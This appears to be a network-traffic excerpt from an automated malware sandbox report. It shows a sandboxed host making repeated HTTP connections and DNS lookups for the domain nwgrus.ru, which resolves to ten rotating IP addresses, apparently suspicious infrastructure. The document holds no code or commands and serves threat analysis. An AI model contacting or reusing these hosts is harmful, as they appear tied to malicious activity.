Oct 1, 2024 15:19:28.939748049 CEST	49768	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:28.944602013 CEST	80	49768	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:28.944713116 CEST	80	49768	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:30.039554119 CEST	80	49768	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:30.039614916 CEST	80	49768	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:30.039822102 CEST	49768	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:30.039942026 CEST	49768	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:30.044997931 CEST	80	49768	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:34.498941898 CEST	49769	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:34.503876925 CEST	80	49769	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:34.503994942 CEST	49769	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:34.504096031 CEST	49769	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:34.504173040 CEST	49769	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:34.508874893 CEST	80	49769	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:34.509087086 CEST	80	49769	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:35.601290941 CEST	80	49769	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:35.601697922 CEST	80	49769	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:35.601803064 CEST	49769	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:35.602581978 CEST	49769	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:35.607872963 CEST	80	49769	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:41.185395956 CEST	49770	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:41.190818071 CEST	80	49770	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:41.190916061 CEST	49770	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:41.191082954 CEST	49770	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:41.191118002 CEST	49770	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:41.196511984 CEST	80	49770	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:41.196542025 CEST	80	49770	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:42.320750952 CEST	80	49770	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:42.320799112 CEST	80	49770	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:42.320909023 CEST	49770	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:42.321075916 CEST	49770	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:42.325965881 CEST	80	49770	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:46.690525055 CEST	49771	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:46.695473909 CEST	80	49771	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:46.695559025 CEST	49771	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:46.695696115 CEST	49771	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:46.695724010 CEST	49771	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:46.700422049 CEST	80	49771	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:46.700459003 CEST	80	49771	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:47.790616989 CEST	80	49771	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:47.790965080 CEST	80	49771	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:47.791065931 CEST	49771	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:47.791096926 CEST	49771	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:47.803268909 CEST	80	49771	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:55.285552979 CEST	49772	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:19:55.290549040 CEST	80	49772	187.131.253.169	192.168.2.4
Oct 1, 2024 15:19:55.290637016 CEST	49772	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:19:55.290777922 CEST	49772	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:19:55.290815115 CEST	49772	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:19:55.295609951 CEST	80	49772	187.131.253.169	192.168.2.4
Oct 1, 2024 15:19:55.295857906 CEST	80	49772	187.131.253.169	192.168.2.4
Oct 1, 2024 15:19:56.389751911 CEST	80	49772	187.131.253.169	192.168.2.4
Oct 1, 2024 15:19:56.389815092 CEST	80	49772	187.131.253.169	192.168.2.4
Oct 1, 2024 15:19:56.389825106 CEST	80	49772	187.131.253.169	192.168.2.4
Oct 1, 2024 15:19:56.389866114 CEST	49772	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:19:56.389914036 CEST	49772	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:19:56.390023947 CEST	49772	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:19:56.396209002 CEST	80	49772	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:01.055428028 CEST	49773	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:01.061125040 CEST	80	49773	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:01.061896086 CEST	49773	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:01.062087059 CEST	49773	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:01.062105894 CEST	49773	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:01.068075895 CEST	80	49773	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:01.068578005 CEST	80	49773	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:02.020612955 CEST	80	49773	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:02.025424004 CEST	80	49773	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:02.025492907 CEST	49773	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:02.025544882 CEST	49773	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:02.032139063 CEST	80	49773	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:06.357049942 CEST	49774	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:06.362009048 CEST	80	49774	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:06.362175941 CEST	49774	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:06.362241030 CEST	49774	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:06.362256050 CEST	49774	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:06.367302895 CEST	80	49774	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:06.367356062 CEST	80	49774	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:07.324738026 CEST	80	49774	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:07.324940920 CEST	80	49774	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:07.324997902 CEST	49774	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:07.325037956 CEST	49774	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:07.329893112 CEST	80	49774	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:12.385631084 CEST	49775	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:12.457861900 CEST	80	49775	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:12.457947016 CEST	49775	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:12.458080053 CEST	49775	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:12.458101034 CEST	49775	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:12.463021994 CEST	80	49775	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:12.463639975 CEST	80	49775	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:13.530782938 CEST	80	49775	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:13.530905962 CEST	80	49775	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:13.530915976 CEST	80	49775	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:13.530972004 CEST	49775	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:13.531141996 CEST	49775	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:13.535896063 CEST	80	49775	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:17.892683983 CEST	49776	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:17.967000961 CEST	80	49776	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:17.967088938 CEST	49776	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:17.967247009 CEST	49776	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:17.967266083 CEST	49776	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:17.972001076 CEST	80	49776	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:17.972141981 CEST	80	49776	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:19.523677111 CEST	80	49776	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:19.523699045 CEST	80	49776	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:19.523709059 CEST	80	49776	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:19.523772001 CEST	80	49776	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:19.524008989 CEST	49776	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:19.524116039 CEST	49776	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:19.524116039 CEST	49776	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:19.528892040 CEST	80	49776	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:24.676763058 CEST	49777	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:24.681968927 CEST	80	49777	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:24.682076931 CEST	49777	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:24.682240009 CEST	49777	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:24.682265997 CEST	49777	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:24.687267065 CEST	80	49777	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:24.687525988 CEST	80	49777	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:25.647753954 CEST	80	49777	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:25.648049116 CEST	80	49777	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:25.648094893 CEST	49777	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:25.650413036 CEST	49777	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:25.655793905 CEST	80	49777	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:30.552651882 CEST	49778	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:30.557573080 CEST	80	49778	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:30.557800055 CEST	49778	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:30.557919025 CEST	49778	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:30.557948112 CEST	49778	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:30.562913895 CEST	80	49778	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:30.563182116 CEST	80	49778	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:31.521358967 CEST	80	49778	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:31.521388054 CEST	80	49778	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:31.521429062 CEST	49778	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:31.521555901 CEST	49778	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:31.526273012 CEST	80	49778	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:35.179691076 CEST	49779	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:35.217693090 CEST	80	49779	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:35.217789888 CEST	49779	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:35.217917919 CEST	49779	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:35.217932940 CEST	49779	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:35.222702026 CEST	80	49779	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:35.222883940 CEST	80	49779	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:36.199208021 CEST	80	49779	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:36.199249029 CEST	80	49779	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:36.199335098 CEST	49779	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:36.199521065 CEST	49779	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:36.204262018 CEST	80	49779	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:40.140780926 CEST	49780	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:40.145731926 CEST	80	49780	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:40.145817041 CEST	49780	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:40.145922899 CEST	49780	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:40.145936966 CEST	49780	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:40.150835991 CEST	80	49780	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:40.150845051 CEST	80	49780	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:41.110836983 CEST	80	49780	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:41.110863924 CEST	80	49780	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:41.110917091 CEST	49780	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:41.111092091 CEST	49780	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:41.115873098 CEST	80	49780	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:46.084177017 CEST	49781	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:46.089056969 CEST	80	49781	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:46.089241028 CEST	49781	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:46.089329004 CEST	49781	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:46.089354038 CEST	49781	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:46.094125986 CEST	80	49781	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:46.094484091 CEST	80	49781	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:47.770889997 CEST	80	49781	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:47.770909071 CEST	80	49781	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:47.770917892 CEST	80	49781	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:47.770977020 CEST	49781	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:47.771024942 CEST	49781	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:47.771155119 CEST	49781	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:47.771214008 CEST	80	49781	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:47.771256924 CEST	49781	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:47.771483898 CEST	80	49781	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:47.771524906 CEST	49781	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:47.775875092 CEST	80	49781	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:52.899945974 CEST	49782	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:52.904849052 CEST	80	49782	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:52.904911041 CEST	49782	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:52.905045986 CEST	49782	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:52.905060053 CEST	49782	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:52.909779072 CEST	80	49782	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:52.909982920 CEST	80	49782	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:54.025105953 CEST	80	49782	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:54.025141954 CEST	80	49782	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:54.025167942 CEST	80	49782	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:54.025223017 CEST	49782	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:54.025264978 CEST	49782	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:54.025444984 CEST	49782	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:54.030210018 CEST	80	49782	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:58.529503107 CEST	49783	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:58.534431934 CEST	80	49783	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:58.534496069 CEST	49783	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:58.534616947 CEST	49783	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:58.534627914 CEST	49783	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:58.539578915 CEST	80	49783	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:58.539886951 CEST	80	49783	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:59.510467052 CEST	80	49783	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:59.510586977 CEST	80	49783	187.131.253.169	192.168.2.4
Oct 1, 2024 15:20:59.510648966 CEST	49783	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:59.510708094 CEST	49783	80	192.168.2.4	187.131.253.169
Oct 1, 2024 15:20:59.515568972 CEST	80	49783	187.131.253.169	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 15:17:20.132869005 CEST	58725	53	192.168.2.4	1.1.1.1
Oct 1, 2024 15:17:21.118122101 CEST	58725	53	192.168.2.4	1.1.1.1
Oct 1, 2024 15:17:22.214936018 CEST	58725	53	192.168.2.4	1.1.1.1
Oct 1, 2024 15:17:22.421433926 CEST	53	58725	1.1.1.1	192.168.2.4
Oct 1, 2024 15:17:22.422081947 CEST	53	58725	1.1.1.1	192.168.2.4
Oct 1, 2024 15:17:22.422563076 CEST	53	58725	1.1.1.1	192.168.2.4
Oct 1, 2024 15:19:52.888026953 CEST	58021	53	192.168.2.4	1.1.1.1
Oct 1, 2024 15:19:53.883910894 CEST	58021	53	192.168.2.4	1.1.1.1
Oct 1, 2024 15:19:54.899472952 CEST	58021	53	192.168.2.4	1.1.1.1
Oct 1, 2024 15:19:55.284605980 CEST	53	58021	1.1.1.1	192.168.2.4
Oct 1, 2024 15:19:55.284629107 CEST	53	58021	1.1.1.1	192.168.2.4
Oct 1, 2024 15:19:55.287265062 CEST	53	58021	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 1, 2024 15:17:20.132869005 CEST	192.168.2.4	1.1.1.1	0x63e	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:21.118122101 CEST	192.168.2.4	1.1.1.1	0x63e	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.214936018 CEST	192.168.2.4	1.1.1.1	0x63e	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:52.888026953 CEST	192.168.2.4	1.1.1.1	0x8010	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:53.883910894 CEST	192.168.2.4	1.1.1.1	0x8010	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:54.899472952 CEST	192.168.2.4	1.1.1.1	0x8010	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 1, 2024 15:17:22.421433926 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.421433926 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.421433926 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.421433926 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	179.52.87.163	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.421433926 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.421433926 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	190.147.2.86	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.421433926 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.421433926 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.421433926 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	95.86.30.3	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.421433926 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422081947 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422081947 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422081947 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422081947 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	179.52.87.163	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422081947 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422081947 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	190.147.2.86	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422081947 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422081947 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422081947 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	95.86.30.3	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422081947 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422563076 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422563076 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422563076 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422563076 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	179.52.87.163	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422563076 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422563076 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	190.147.2.86	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422563076 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422563076 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422563076 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	95.86.30.3	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:17:22.422563076 CEST	1.1.1.1	192.168.2.4	0x63e	No error (0)	nwgrus.ru	189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284605980 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284605980 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	95.86.30.3	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284605980 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284605980 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284605980 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284605980 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284605980 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	179.52.87.163	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284605980 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284605980 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	190.147.2.86	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284605980 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284629107 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284629107 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	95.86.30.3	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284629107 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284629107 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284629107 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284629107 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284629107 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	179.52.87.163	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284629107 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284629107 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	190.147.2.86	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.284629107 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.287265062 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.287265062 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	190.147.2.86	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.287265062 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.287265062 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.287265062 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
